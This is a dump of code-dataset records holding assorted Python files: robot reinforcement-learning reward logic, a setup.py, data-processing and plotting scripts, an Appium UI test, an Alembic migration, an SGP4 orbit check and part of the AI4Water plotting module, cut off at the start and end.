quaternion_conjugate(observations[16:]))\n # print(\"check distance {} and orientation err {} \".format(distance_gripper_to_target, orientation_error))\n\n if distance_gripper_to_target < 0.05 and np.abs(orientation_error[0]) < 0.1:\n done = True\n print(\"Success! Distance {} and orientation err {} \".format(distance_gripper_to_target, orientation_error[0]))\n done_reward = reward_reached_goal\n\n # Successfully reached goal: Contact with both contact sensors and there is no invalid contact\n # if observations[7] != 0 and observations[8] != 0 and not invalid_collision:\n # done = True\n # print('>>>>>> Success!')\n # done_reward = reward_reached_goal\n # # save state in csv file\n # U.append_to_csv(self.csv_success_exp, observations)\n # self.successful_attempts += 1\n # print(\"Successful contact so far: {} attempts\".format(self.successful_attempts))\n\n # Crashing with itself, shelf, base\n if invalid_collision:\n done = True\n print('>>>>>>>>>>>>>>>>>>>> crashing')\n # done_reward = reward_crashing\n\n return done, done_reward, invalid_collision\n\n def load_position(self):\n pass\n\n def _update_episode(self):\n \"\"\"\n Publishes the accumulated reward of the episode and\n increases the episode number by one.\n :return:\n \"\"\"\n if self.episode_num > 0:\n self._publish_reward_topic(\n self.accumulated_episode_reward,\n self.episode_steps,\n self.episode_num\n )\n\n self.episode_num += 1\n self.accumulated_episode_reward = 0\n self.episode_steps = 0\n\n def _publish_reward_topic(self, reward, steps, episode_number=1):\n \"\"\"\n This function publishes the given reward in the reward topic for\n easy access from ROS infrastructure.\n :param reward:\n :param episode_number:\n :return:\n \"\"\"\n reward_msg = RLExperimentInfo()\n reward_msg.episode_number = episode_number\n reward_msg.episode_reward = reward\n self.reward_pub.publish(reward_msg)\n self.reward_list.append(reward)\n self.episode_list.append(episode_number)\n self.step_list.append(steps)\n list = str(reward) + \";\" + str(episode_number) + \";\" + str(steps) + \"\\n\"\n\n with open(self.csv_name + '.csv', 'a') as csv:\n csv.write(str(list))\n","sub_path":"environments/pickbot_lift_continuous.py","file_name":"pickbot_lift_continuous.py","file_ext":"py","file_size_in_byte":34342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"113670762","text":"import json\r\n\r\ndef getnumber():\r\n number = input(\"What's your favorite number? \")\r\n with open('favorite_number.json', 'w') as f:\r\n json.dump(number, f)\r\n print(\"Thanks! I'll remember that.\")\r\n\r\ndef favread():\r\n try:\r\n with open('favorite_number.json') as f:\r\n number = json.load(f)\r\n return number\r\n except FileNotFoundError:\r\n return None\r\n\r\ndef whatsmyfav():\r\n number = favread()\r\n if number:\r\n print(\"I know your favorite number! It's\", number)\r\n else:\r\n getnumber()\r\n\r\nwhatsmyfav()","sub_path":"2-10-2019/Fav Number.py","file_name":"Fav Number.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"123287412","text":"# -*- coding: utf-8 -*-\nimport sys\nfrom os.path import (dirname, join)\nfrom distutils.core import setup\nfrom setuptools import find_packages\n\n\n__version__ = open(join(dirname(__file__), 'konrad', 'VERSION')).read().strip()\n\nwith open('README.md') as f:\n long_description = f.read()\n\nsetup(\n name='konrad',\n author='The konrad developers',\n version=__version__,\n url='https://github.com/atmtools/konrad',\n download_url='https://github.com/atmtools/konrad/tarball/v' + __version__,\n packages=find_packages(),\n license='MIT',\n description='Implementation of a radiative-convective equilibrium model.',\n long_description=long_description,\n long_description_content_type='text/markdown',\n classifiers=[\n # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n ],\n python_requires='>=3.6',\n include_package_data=True,\n install_requires=[\n 'matplotlib>=2.0.0',\n 'netcdf4>=1.2.7',\n 'numpy>=1.16.0',\n 'scipy>=0.19.0',\n 'typhon>=0.7.0',\n 'xarray>=0.9.1',\n 'climt>=0.16.25',\n 'sympl>=0.4.0',\n ],\n extras_require={\n 'arts': [\n 'pyarts',\n ],\n 'docs': [\n 'sphinx',\n 'sphinx_rtd_theme',\n ],\n 'tests': [\n 'pytest',\n ],\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"136410695","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 7 14:51:41 2017\n\n@author: yuchenli\n\"\"\"\n\nimport pandas as pd\nSJR_weighted = pd.read_csv(\"/Users/yuchenli/Box Sync/Yuchen_project/\"\n \"Truven_rising_stars/SJR_education_clustering/\"\n \"600_SJR_weighted.csv\", sep = \",\", encoding = 'utf-8')\neducation = pd.read_csv(\"/Users/yuchenli/Box Sync/Yuchen_project/\"\n \"Truven_rising_stars/SJR_education_clustering/\"\n \"education_score.csv\", sep = \",\", encoding = 'utf-8')\n\n# Convert them to dictionaries\nSJR_dict = dict(zip(SJR_weighted.ID, SJR_weighted.score))\n\nimport csv\nwith open(\"/Users/yuchenli/Box Sync/Yuchen_project/Truven_rising_stars/\"\n \"SJR_education_clustering/SJR_education.csv\", \"w\") as csvfile:\n fieldnames = ['HBE_ID', \"Education_score\", \"SJR\", \"KOL\"]\n writer = csv.DictWriter(csvfile, fieldnames = fieldnames)\n writer.writeheader()\n i = 0\n for i in range(len(education)):\n HBE_ID = education.loc[i,\"HBE_ID\"]\n Education_score = education.loc[i, \"Education_score\"]\n KOL = education.loc[i, \"KOL\"]\n try:\n SJR = SJR_dict[HBE_ID]\n writer.writerow({'HBE_ID': HBE_ID, \"Education_score\": Education_score, \n \"SJR\": SJR, \"KOL\": KOL})\n \n except:\n i=+1\n pass \n\n# Test: Temp_2972_1004 \ntest = pd.read_csv(\"/Users/yuchenli/Box Sync/Yuchen_project/\"\n \"Truven_rising_stars/SJR_education_clustering/\"\n \"SJR_education.csv\", sep = \",\", encoding = 'utf-8')\nset_1 = set(test.HBE_ID)\nset_2 = set(education.HBE_ID)\nset_2.difference(set_1)\n\n# Plot test in 2-D\nimport matplotlib.pyplot as plt\n\n# Take outlier\ntest = test[test['HBE_ID'] != 'HBE_ONC_1000335']\n\nfig = plt.figure()\nax1 = fig.add_subplot(111)\n\nax1.scatter(test[test['KOL']=='No']['SJR'], \\\n test[test['KOL']=='No']['Education_score'], \n s=10, c='b', marker='s', label='Non')\n\nax1.scatter(test[test['KOL']=='Yes']['SJR'], \\\n test[test['KOL']=='Yes']['Education_score'], \n s=10, c='r', marker='o', label='KOL')\nplt.xlabel('SJR')\nplt.ylabel('Education_score')\nplt.legend(loc='upper right')\nplt.show()\n","sub_path":"SJR_education_clustering/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"335211976","text":"# -*- coding; UTF-8 -*-\nimport os, time\nimport unittest\nfrom appium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nimport uiautomator\nfrom Practice.Common.Swipe_Action import swipeUp\n\nclass ScrollTo(unittest.TestCase):\n def setUp(self):\n desired_caps = {}\n desired_caps['platformName'] = 'Android'\n desired_caps['platformVersion'] = '4.4.4'\n desired_caps['deviceName'] = '192.168.1.101:5555'\n desired_caps['appPackage'] = 'com.example.android.apis'\n desired_caps['appActivity'] = 'com.example.android.apis.ApiDemos'\n self.driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)\n self.driver.implicitly_wait(15)\n def tearDown(self):\n self.driver.quit()\n\n def test_ScrollTo(self):\n #Scroll till element is visible\n while 1:\n try:\n views = self.driver.find_element_by_android_uiautomator('new UiSelector().text(\"Views\")')\n views.is_displayed()\n time.sleep(1)\n views.click() #click on Views\n break\n except NoSuchElementException:\n swipeUp(self, 2000)\n time.sleep(2)\n #Scroll till element which contains Spinner text\n spinner = self.driver.find_element_by_android_uiautomator('new UiScrollable(new UiSelector().scrollable(true).instance(0)).scrollIntoView(new UiSelector().text(\"Spinner\").instance(0));')\n time.sleep(1)\n print(\"Spinner text has been found and now clicking on It.\")\n spinner.click() #click on Spinner\n #Click on Planet drop down to open drop down list\n ele = self.driver.find_element_by_id(\"com.example.android.apis:id/spinner2\")\n ele.find_element_by_id(\"android:id/text1\")\n ele.click()\n #self.driver.find_element_by_id(\"com.example.android.apis:id/spinner2\").click()\n pluto = self.driver.find_element_by_android_uiautomator('new UiScrollable(new UiSelector().scrollable(true).instance(0)).scrollIntoView(new UiSelector().text(\"Pluto\").instance(0));')\n time.sleep(1)\n print(\"Pluto text has been found and now clicking on It.\")\n pluto.click()\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(ScrollTo)\n unittest.TextTestRunner(verbosity=2).run(suite)","sub_path":"Practice/ScrollDownInSpinnerList.py","file_name":"ScrollDownInSpinnerList.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"246642220","text":"from __future__ import division\nimport numpy as np\n\ndef savetimeseries(t, y, fileprefix):\n \n '''\n save timeseries data to file\n '''\n\n filename = fileprefix + '.txt'\n N = len(t)\n ts = np.zeros([N,2])\n ts[:,0] = t\n ts[:,1] = y\n np.savetxt(filename, ts)\n\n return\n","sub_path":"code/savetimeseries.py","file_name":"savetimeseries.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"587554127","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 25 14:14:11 2019\r\n\r\n@author: binxi\r\n\"\"\"\r\n\r\n# Definition for singly-linked list.\r\n# class ListNode(object):\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution(object):\r\n def rotateRight(self, head, k):\r\n \"\"\"\r\n :type head: ListNode\r\n :type k: int\r\n :rtype: ListNode\r\n \"\"\"\r\n if head == None:\r\n return None\r\n exit\r\n \r\n lst = [head]\r\n \r\n while head.next != None:\r\n head = head.next\r\n lst.append(head)\r\n \r\n lst[-1].next = lst[0]\r\n\r\n length = len(lst)\r\n \r\n k = k % length\r\n \r\n node = lst[length - 1 - k].next\r\n \r\n lst[length - 1 - k].next = None\r\n \r\n return node","sub_path":"Leetcode/#61 Rotate List.py","file_name":"#61 Rotate List.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"50152041","text":"\"\"\"Added notes table\n\nRevision ID: 36e3cf26d28\nRevises: \nCreate Date: 2015-07-01 15:41:56.353393\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '36e3cf26d28'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('notes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('source', sa.Text(), nullable=True),\n sa.Column('source_type', sa.Integer(), nullable=True),\n sa.Column('text', sa.Text(), nullable=True),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('notes')\n ### end Alembic commands ###\n","sub_path":"alembic/versions/36e3cf26d28_added_notes_table.py","file_name":"36e3cf26d28_added_notes_table.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"436324188","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nVerify against SGP4\n\"\"\"\n\nimport pdb\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sim_config import *\nfrom simulation_step import simulation_step\nfrom propagate_step import sgp4_step\n\n\n#----------------Initialize / Setup Workspace------------------\ntspan = np.array([0, 864]) # [sec]\nT = np.arange(0, tspan[1]+tstep, tstep)\n\n\n#---------------------Initial State Vector---------------------\nr_i, v_i = sgp4_step(line1, line2, tstart)\n# pdb.set_trace()\nstate_i = np.r_[r_i, q_i, v_i, w_i]\nstate_history = np.zeros((np.shape(T)[0], np.shape(state_i)[0]))\nstate_history_sgp4 = np.zeros((np.shape(T)[0], 6))\nstate_history[0, :] = state_i\nstate_history_sgp4[0, :] = np.r_[r_i, v_i]\nsim_state = {'state': state_i, 't': tstart}\n\n\n\n#---------------------Propagate---------------------------\nfor i, elapsed_t in enumerate(T[0:-1]):\n\n\t# Simulator\n\tsensors, sim_state = simulation_step(np.zeros(3), sim_state)\n\tstate_history[i+1, :] = sim_state['state']\n\n\t# SGP4\n\tstate_history_sgp4[i+1, :] = np.array(sgp4_step(line1, line2, sim_state['t'])).reshape((6,))\n\n\tprint(i)\n\t# print(state_history[i+1, 3:7])\n\n\n#------------------------Plot-----------------------------\nplt.figure()\nplt.plot(T/3600, np.linalg.norm(state_history[:, 0:3] - state_history_sgp4[:, 0:3], axis=1), label=\"position [km]\")\nplt.plot(T/3600, 1e3*np.linalg.norm(state_history[:, 7:10] - state_history_sgp4[:, 3:6], axis=1), label=\"velocity [m/s]\")\nplt.xlabel('time [hr]')\nplt.ylabel('error')\nplt.legend()\nplt.grid()\nplt.suptitle('Error against SGP4')\n\nplt.figure()\nplt.plot(T/3600, np.linalg.norm(state_history[:,0:3], axis=1) - 6378.0, label=\"sim\")\nplt.plot(T/3600, np.linalg.norm(state_history_sgp4[:,0:3], axis=1) - 6378.0, label=\"sgp4\")\nplt.xlabel('time [hr]')\nplt.ylabel('altitude [km]')\nplt.legend()\nplt.grid()\n\nplt.figure()\nplt.plot(state_history[:,0], state_history[:,1])\nplt.xlabel('X_ECI')\nplt.ylabel('Y_ECI')\nplt.grid()\n\nplt.figure()\nplt.plot(T/3600, state_history[:,3:7])\nplt.xlabel('time [hr]')\nplt.ylabel('quaternions')\nplt.grid()\n\nplt.figure()\nplt.plot(T/3600, state_history[:,10:13])\nplt.xlabel('time [hr]')\nplt.ylabel('angular velocity [rad/s]')\nplt.grid()\n\nplt.show()","sub_path":"Simulator/verify_sgp4.py","file_name":"verify_sgp4.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"294366487","text":"import os\nimport json\nimport warnings\nfrom typing import Any, Callable, List, Tuple, Union\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport tensorflow as tf\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nfrom AI4Water.backend import xgboost\n\nfrom AI4Water.utils.SeqMetrics import RegressionMetrics\nfrom AI4Water.utils.utils import _missing_vals\nfrom AI4Water.utils.utils import find_tot_plots, init_subplots, Jsonize\nfrom AI4Water.utils.transformations import Transformations\n\n# TODO add Murphy's plot as shown in MLAir\n# https://robjhyndman.com/hyndsight/murphy-diagrams/\n# competitive skill score plot/ bootstrap skill score plot as in MLAir\n# rank histogram and reliability diagram for probabilitic forecasting model.\n# show availability plot of data\n\nclass Plot(object):\n\n def __init__(self, path = None):\n self.path = path\n\n @property\n def path(self):\n return self._path\n\n @path.setter\n def path(self, x):\n if x is None:\n x = os.getcwd()\n self._path = x\n\n def save_or_show(self, save: bool = True, fname=None, where='', dpi=300, bbox_inches='tight', close=True):\n\n if save:\n assert isinstance(fname, str)\n if \"/\" in fname:\n fname = fname.replace(\"/\", \"__\")\n if \":\" in fname:\n fname = fname.replace(\":\", \"__\")\n\n save_dir = os.path.join(self.path, where)\n\n if not os.path.exists(save_dir):\n assert os.path.dirname(where) in ['', 'activations', 'weights', 'plots', 'data', 'results'], f\"unknown directory: {where}\"\n save_dir = os.path.join(self.path, where)\n\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n fname = os.path.join(save_dir, fname + \".png\")\n\n plt.savefig(fname, dpi=dpi, bbox_inches=bbox_inches)\n else:\n plt.show()\n\n if close:\n plt.close('all')\n return\n\nclass Interpret(Plot):\n\n def __init__(self, model):\n \"\"\"Interprets the AI4Water Model.\"\"\"\n\n self.model = model\n\n super().__init__(model.path)\n\n if self.model.category.upper() == \"DL\":\n\n if any(['attn_weight' in l for l in model.layer_names]):\n self.plot_act_along_inputs(f'attn_weight_{model.lookback - 1}_1', name='attention_weights')\n\n if hasattr(model, 'TemporalFusionTransformer_attentions'):\n atten_components = self.tft_attention_components()\n\n @property\n def model(self):\n return self._model\n\n @model.setter\n def model(self, x):\n self._model = x\n\n def plot(self):\n \"\"\"\n For NBeats, plot seasonality and trend https://pytorch-forecasting.readthedocs.io/en/latest/tutorials/ar.html#Interpret-model\n For TFT, attention, variable importance of static, encoder and decoder, partial dependency\n # https://pytorch-forecasting.readthedocs.io/en/latest/tutorials/stallion.html#Variable-importances\n\n \"\"\"\n\n def feature_importance(self):\n if self.model.category.upper() == \"ML\":\n\n model_name = list(self.model.config['model'].keys())[0]\n if model_name.upper() in [\"SVC\", \"SVR\"]:\n if self.model._model.kernel == \"linear\":\n # https://stackoverflow.com/questions/41592661/determining-the-most-contributing-features-for-svm-classifier-in-sklearn\n return self.model._model.coef_\n elif hasattr(self.model._model, \"feature_importances_\"):\n return self.model._model.feature_importances_\n\n def f_importances_svm(self, coef, names, save):\n\n plt.close('all')\n mpl.rcParams.update(mpl.rcParamsDefault)\n classes = coef.shape[0]\n features = coef.shape[1]\n fig, axis = plt.subplots(classes, sharex='all')\n axis = axis if hasattr(axis, \"__len__\") else [axis]\n\n for idx, ax in enumerate(axis):\n colors = ['red' if c < 0 else 'blue' for c in self._model.coef_[idx]]\n ax.bar(range(features), self._model.coef_[idx], 0.4)\n\n plt.xticks(ticks=range(features), labels=self.model.in_cols, rotation=90, fontsize=12)\n self.save_or_show(save=save, fname=f\"{list(self.model.config['model'].keys())[0]}_feature_importance\")\n return\n\n def plot_feature_importance(self, importance=None, save=True, use_xgb=False, **kwargs):\n\n if importance is None:\n importance = self.feature_importance()\n\n if self.model.category == \"ML\":\n model_name = list(self.model.config['model'].keys())[0]\n if model_name.upper() in [\"SVC\", \"SVR\"]:\n if self._model.kernel == \"linear\":\n return self.f_importances_svm(importance, self.model.in_cols, save=save)\n else:\n warnings.warn(f\"for {self._model.kernel} kernels of {model_name}, feature importance can not be plotted.\")\n return\n\n if isinstance(importance, np.ndarray):\n assert importance.ndim <= 2\n\n with open(os.path.join(self.model.path, 'feature_importance.json'), 'w') as fp:\n json.dump(Jsonize(importance)(), fp)\n\n use_prev = self.model.config['use_predicted_output']\n all_cols = self.model.config['inputs'] if use_prev else self.model.config['inputs'] + \\\n self.model.config['outputs']\n plt.close('all')\n plt.figure()\n plt.title(\"Feature importance\")\n if use_xgb:\n if xgboost is None:\n warnings.warn(\"install xgboost to plot plot_importance using xgboost\", UserWarning)\n else:\n xgboost.plot_importance(self._model, **kwargs)\n else:\n plt.bar(range(self.model.ins if use_prev else self.model.ins + self.model.outs), importance, **kwargs)\n plt.xticks(ticks=range(len(all_cols)), labels=list(all_cols), rotation=90, fontsize=12)\n self.save_or_show(save, fname=\"feature_importance.png\")\n return\n\n def plot_act_along_inputs(self, layer_name: str, name: str = None, vmin=0, vmax=0.8, **kwargs):\n\n ins = self.model.ins\n outs= self.model.outs\n in_cols = self.model.in_cols\n out_cols = self.model.out_cols\n\n assert isinstance(layer_name, str), \"layer_name must be a string, not of {} type\".format(layer_name.__class__.__name__)\n\n predictions, observations = self.model.predict(pp=False, **kwargs)\n\n activation, data = self.model.activations(layer_names=layer_name, return_input=True, **kwargs)\n\n activation = activation[layer_name]\n data = self.model.inputs_for_attention(data)\n\n assert data.shape[1] == ins\n\n plt.close('all')\n\n for out in range(outs):\n pred = predictions[:, out]\n obs = observations[:, out]\n out_name = out_cols[out]\n\n for idx in range(ins):\n\n fig, (ax1, ax2, ax3) = plt.subplots(3, sharex='all')\n fig.set_figheight(10)\n\n ax1.plot(data[:, idx], label=in_cols[idx])\n ax1.legend()\n ax1.set_title('activations w.r.t ' + in_cols[idx])\n ax1.set_ylabel(in_cols[idx])\n\n ax2.plot(pred, label='Prediction')\n ax2.plot(obs, '.', label='Observed')\n ax2.legend()\n\n im = ax3.imshow(activation[:, :, idx].transpose(), aspect='auto', vmin=vmin, vmax=vmax)\n ax3.set_ylabel('lookback steps')\n ax3.set_xlabel('Examples')\n fig.colorbar(im, orientation='horizontal', pad=0.2)\n plt.subplots_adjust(wspace=0.005, hspace=0.005)\n if name is not None:\n _name = out_name + '_' + name\n plt.savefig(os.path.join(self.model.act_path, _name) + in_cols[idx], dpi=400, bbox_inches='tight')\n else:\n plt.show()\n plt.close('all')\n return\n\n def tft_attention_components(self, model=None, **train_data_args)->dict:\n \"\"\"\n Gets attention components of tft layer from AI4Water's Model.\n Arguments:\n model : a AI4Water's Model instance.\n train_data_args : keyword arguments which will passed to train_data method to fetch processed input data\n\n returns:\n dictionary containing attention components of tft as numpy arrays. Following four attention\n components are present in the dictionary\n decoder_self_attn: (attention_heads, ?, total_time_steps, 22)\n static_variable_selection_weights:\n encoder_variable_selection_weights: (?, encoder_steps, input_features)\n decoder_variable_selection_weights: (?, decoder_steps, input_features)\n \"\"\"\n if model is None:\n model = self.model\n\n x, _, _ = model.train_data(**train_data_args)\n attention_components = {}\n\n for k, v in model.TemporalFusionTransformer_attentions.items():\n if v is not None:\n temp_model = tf.keras.Model(inputs=model._model.inputs,\n outputs=v)\n attention_components[k] = temp_model.predict(x=x, verbose=1, steps=1)\n return attention_components\n\n def interpret_tft(self, outputs:dict, tft_params:dict, reduction: Union[None, str]=None):\n \"\"\"\n inspired from `interpret_output` of PyTorchForecasting\n :param outputs: outputs from tft model. It is expected to have following keys and their values as np.ndarrays\n prediction: (num_examples, forecast_len, outs/quantiles)\n attention: (num_examples, forecast_len, num_heads, total_sequence_length)\n static_variable_selection_weights: (num_examples, 1, num_static_inputs)\n encoder_variable_selection_weights: (batch_size, encoder_length, 1, num_enocder_inputs)\n decoder_variable_selection_weights: (batch_size, decoder_steps, 1, num_decoder_inputs)\n groups: (num_examples, num_groups)\n decoder_time_index: (num_examples, forecast_len)\n :param tft_params: parameters which were used to build tft layer\n :param reduction:\n\n Returns:\n intetrpretation: dict, dictionary of keys with values as np.ndarrays\n attention: (encoder_length,)\n static_variables: (7,)\n encoder_variables: (13,)\n decoder_variables: (6,)\n encoder_length_histogram: (encoder_length+1)\n decoder_length_histogram: (decoder_length,)\n \"\"\"\n num_examples = outputs['predictions'].shape[0]\n encoder_lengths = np.full(num_examples, tft_params['num_encoder_steps'])\n decoder_lengths = np.full(num_examples, tft_params['total_time_steps'] - tft_params['num_encoder_steps'])\n\n # histogram of decode and encode lengths\n encoder_length_histogram = integer_histogram(encoder_lengths, _min=0, _max=tft_params['num_encoder_steps'])\n decoder_length_histogram = integer_histogram(\n decoder_lengths, _min=1, _max=decoder_lengths.shape[1]\n )\n\n # mask where decoder and encoder where not applied when averaging variable selection weights\n encoder_variables = outputs[\"encoder_variables\"].squeeze(-2)\n encode_mask = create_mask(encoder_variables.shape[1], encoder_lengths)\n encoder_variables = encoder_variables.masked_fill(encode_mask.unsqueeze(-1), 0.0).sum(dim=1)\n encoder_variables /= (\n outputs[\"encoder_lengths\"]\n .where(encoder_lengths > 0, np.ones_like(encoder_lengths))\n .unsqueeze(-1)\n )\n\n decoder_variables = decoder_lengths.squeeze(-2)\n decode_mask = create_mask(decoder_variables.size(1), decoder_lengths)\n decoder_variables = decoder_variables.masked_fill(decode_mask.unsqueeze(-1), 0.0).sum(dim=1)\n decoder_variables /= decoder_lengths.unsqueeze(-1)\n\n if reduction is not None: # if to average over batches\n assert reduction in ['mean', 'sum']\n encoder_variables = encoder_variables.sum(dim=0)\n decoder_variables = decoder_variables.sum(dim=0)\n\n\n interpretation = dict(\n #attention=attention,\n #static_variables=static_variables,\n encoder_variables=encoder_variables,\n decoder_variables=decoder_variables,\n encoder_length_histogram=encoder_length_histogram,\n decoder_length_histogram=decoder_length_histogram,\n )\n return interpretation\n\n\ndef integer_histogram(\n data: np.ndarray, _min: Union[None, int] = None, _max: Union[None, int] = None\n) -> np.ndarray:\n \"\"\"\n Create histogram of integers in predefined range\n Args:\n data: data for which to create histogram\n _min: minimum of histogram, is inferred from data by default\n _max: maximum of histogram, is inferred from data by default\n Returns:\n histogram\n \"\"\"\n uniques, counts = np.unique(data, return_counts=True)\n if _min is None:\n _min = uniques.min()\n if _max is None:\n _max = uniques.max()\n #hist = np.zeros(_max - _min + 1, dtype=np.long).scatter(\n # dim=0, index=uniques - _min, src=counts\n #)\n hist = scatter_numpy(self=np.zeros(_max - _min + 1, dtype=np.long),\n dim=0, index=uniques-_min, src=counts)\n return hist\n\n\ndef create_mask(size: int, lengths: np.ndarray, inverse: bool = False) -> np.ndarray:\n \"\"\"\n Create boolean masks of shape len(lenghts) x size.\n An entry at (i, j) is True if lengths[i] > j.\n Args:\n size (int): size of second dimension\n lengths (torch.LongTensor): tensor of lengths\n inverse (bool, optional): If true, boolean mask is inverted. Defaults to False.\n Returns:\n torch.BoolTensor: mask\n \"\"\"\n if inverse: # return where values are\n return np.arange(size, ).unsqueeze(0) < lengths.unsqueeze(-1)\n else: # return where no values are\n return np.arange(size, ).unsqueeze(0) >= lengths.unsqueeze(-1)\n\n\ndef scatter_numpy(self, dim, index, src):\n \"\"\"\n Writes all values from the Tensor src into self at the indices specified in the index Tensor.\n :param self:\n :param dim: The axis along which to index\n :param index: The indices of elements to scatter\n :param src: The source element(s) to scatter\n :return: self\n \"\"\"\n if index.dtype != np.dtype('int_'):\n raise TypeError(\"The values of index must be integers\")\n if self.ndim != index.ndim:\n raise ValueError(\"Index should have the same number of dimensions as output\")\n if dim >= self.ndim or dim < -self.ndim:\n raise IndexError(\"dim is out of range\")\n if dim < 0:\n # Not sure why scatter should accept dim < 0, but that is the behavior in PyTorch's scatter\n dim = self.ndim + dim\n idx_xsection_shape = index.shape[:dim] + index.shape[dim + 1:]\n self_xsection_shape = self.shape[:dim] + self.shape[dim + 1:]\n if idx_xsection_shape != self_xsection_shape:\n raise ValueError(\"Except for dimension \" + str(dim) +\n \", all dimensions of index and output should be the same size\")\n if (index >= self.shape[dim]).any() or (index < 0).any():\n raise IndexError(\"The values of index must be between 0 and (self.shape[dim] -1)\")\n\n def make_slice(arr, _dim, i):\n slc = [slice(None)] * arr.ndim\n slc[_dim] = i\n return slc\n\n # We use index and dim parameters to create idx\n # idx is in a form that can be used as a NumPy advanced index for scattering of src param. in self\n idx = [[*np.indices(idx_xsection_shape).reshape(index.ndim - 1, -1),\n index[make_slice(index, dim, i)].reshape(1, -1)[0]] for i in range(index.shape[dim])]\n idx = list(np.concatenate(idx, axis=1))\n idx.insert(dim, idx.pop())\n\n if not np.isscalar(src):\n if index.shape[dim] > src.shape[dim]:\n raise IndexError(\"Dimension \" + str(dim) + \"of index can not be bigger than that of src \")\n src_xsection_shape = src.shape[:dim] + src.shape[dim + 1:]\n if idx_xsection_shape != src_xsection_shape:\n raise ValueError(\"Except for dimension \" +\n str(dim) + \", all dimensions of index and src should be the same size\")\n # src_idx is a NumPy advanced index for indexing of elements in the src\n src_idx = list(idx)\n src_idx.pop(dim)\n src_idx.insert(dim, np.repeat(np.arange(index.shape[dim]), np.prod(idx_xsection_shape)))\n self[idx] = src[src_idx]\n\n else:\n self[idx] = src\n\n return self\n\n\nclass Visualizations(Plot):\n\n def __init__(self, data=None, config: dict=None, path=None, dpi=300, in_cols=None, out_cols=None):\n self.config = config\n self.data=data\n self.dpi = dpi\n self.in_cols = in_cols\n self.out_cols = out_cols\n\n super().__init__(path)\n\n @property\n def config(self):\n return self._config\n\n @config.setter\n def config(self, x):\n self._config = x\n\n @property\n def data(self):\n return self._data\n\n @data.setter\n def data(self, x):\n self._data = x\n\n def horizon_plots(self, errors:dict, fname='', save=True):\n plt.close('')\n fig, axis = plt.subplots(len(errors), sharex='all')\n\n legends = {'r2': \"$R^2$\", 'rmse': \"RMSE\", 'nse': \"NSE\"}\n idx = 0\n for metric_name, val in errors.items():\n ax = axis[idx]\n ax.plot(val, '--o', label=legends.get(metric_name, metric_name))\n ax.legend(fontsize=14)\n if idx>=len(errors)-1: ax.set_xlabel(\"Horizons\", fontsize=14)\n ax.set_ylabel(legends.get(metric_name, metric_name), fontsize=14)\n idx += 1\n self.save_or_show(save=save, fname=fname)\n return\n\n def plot_results(self, true, predicted:pd.DataFrame, save=True, name=None, where=None):\n \"\"\"\n # kwargs can be any/all of followings\n # fillstyle:\n # marker:\n # linestyle:\n # markersize:\n # color:\n \"\"\"\n\n regplot(true, predicted, save=save, name=name, where=where)\n self.save_or_show(save=save, fname=f\"{name}_reg\", close=False, where=where)\n\n mpl.rcParams.update(mpl.rcParamsDefault)\n\n fig, axis = init_subplots(width=12, height=8)\n\n # it is quite possible that when data is datetime indexed, then it is not equalidistant and large amount of graph\n # will have not data in that case lines plot will create a lot of useless interpolating lines where no data is present.\n style = '.' if isinstance(true.index, pd.DatetimeIndex) else '-'\n\n if np.isnan(true.values).sum() > 0:\n style = '.' # For Nan values we should be using this style otherwise nothing is plotted.\n\n ms = 4 if style == '.' else 2\n\n axis.plot(predicted, style, color='r', linestyle='-', marker='', label='Prediction')\n\n axis.plot(true, style, color='b', marker='o', fillstyle='none', markersize=ms, label='True')\n\n axis.legend(loc=\"best\", fontsize=22, markerscale=4)\n plt.xticks(fontsize=18)\n plt.yticks(fontsize=18)\n plt.xlabel(\"Time\", fontsize=18)\n\n self.save_or_show(save=save, fname=name, close=False, where=where)\n return\n\n def plot_loss(self, history: dict, 